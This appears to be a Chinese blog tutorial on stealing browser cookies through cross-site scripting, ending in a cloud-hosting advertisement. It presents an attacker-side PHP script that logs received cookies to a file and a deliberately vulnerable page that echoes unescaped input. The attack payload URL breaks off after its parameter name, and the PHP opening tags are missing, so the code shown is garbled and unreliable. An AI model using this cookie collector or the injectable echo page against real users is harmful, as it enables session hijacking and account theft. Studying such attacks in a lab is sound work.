这篇文章将为大家详细讲解有关XSS跨站如何获取cookie,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。
仅用于参考学习
测试环境:hacker端 and victim端
1,hacker端(hacker.php)的程序内容如下:
$cookie=$_GET['cookie'];
$file=fopen("cookie.txt","a");
fwrite($file,$cookie);
fclose($file)
?>
2,受害者端(victim.php)的程序内容如下:
$xss=@$_GET['xss_input'];
echo '你输入的字符为
'.$xss;
?>
3,hacker发给victim的payload语句如下:
http://localhost/victim.php?xss_input=
ps:第一次用的事件不是document.location,选择的是window.open事件,But,没有成功。更换浏览器也不照。
4,当victim点击hacker发送的链接后,Victim主机的cookie就被写入到hacker的cookie.txt文档中了,cookie信息也就因此丢失了,那么hacker久可以利用这个cookie信息针对victim做bulabula....
关于“XSS跨站如何获取cookie”这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,使各位可以学到更多知识,如果觉得文章不错,请把它分享出去让更多的人看到。
另外有需要云服务器可以了解下创新互联scvps.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。